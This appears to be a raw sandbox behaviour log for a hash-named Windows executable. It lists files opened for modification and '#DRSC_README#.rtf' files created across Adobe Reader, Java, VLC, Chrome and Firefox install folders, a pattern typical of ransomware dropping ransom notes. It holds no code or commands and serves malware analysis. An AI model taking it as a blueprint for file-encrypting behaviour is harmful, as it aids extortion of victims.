710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\etc\visualvm.conf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\tr-tr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hu-hu\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_it.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\japanese_over.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sk-sk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sv-se\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fr-fr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse_1.1.200.v20140414-0825.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-annotations-common_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\ext\nashorn.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Combine_R_RHP.aapp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\selection-actions.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\de-de\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\dd_arrow_small.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-charts_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_radio_selected_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\masterix.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.core.commands.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup-impl_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_duplicate_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\selector.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\it-it\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\sl-si\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Certificates_R.aapp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\sandbox.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\nl-nl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\s_thumbnailview_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Photo Viewer\ImagingDevices.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_ja_135x40.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\redact_poster.jpg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\NetworkServerControl 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\EPDF_RHP.aapp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\logo_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Light.pdf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filter_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\rhp_world_icon.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-threaddump_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\da.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sl-si\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\vi_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fi-fi\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_reject_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\arrow-right.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\themes\dark\rhp_world_icon_hover.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ca.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\close_x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ja_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.w3c.dom.smil_1.0.0.v200806040011.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\root\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Scan_visual.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sl-sl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sk-sk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\arrow-left.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\spectrum_spinner.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\new_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-uisupport_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\x_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ca-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\nub.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\LICENSE 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\nbexec64.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\THIRDPARTYLICENSEREADME-JAVAFX.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\rhp_world_icon.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sl-sl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach.zh_CN_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account-select\css\main.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\it.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\jaccess.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\cacerts 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\MANIFEST.MF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sk-sk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\servertool.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sk-sk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\cs-cz\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-multiview_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaBrightRegular.ttf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-lib-uihandler_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\acrobat_pdf.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\sign-in.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\sat_logo.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\SearchEmail2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\tr-tr\#DRSC_README#.rtf 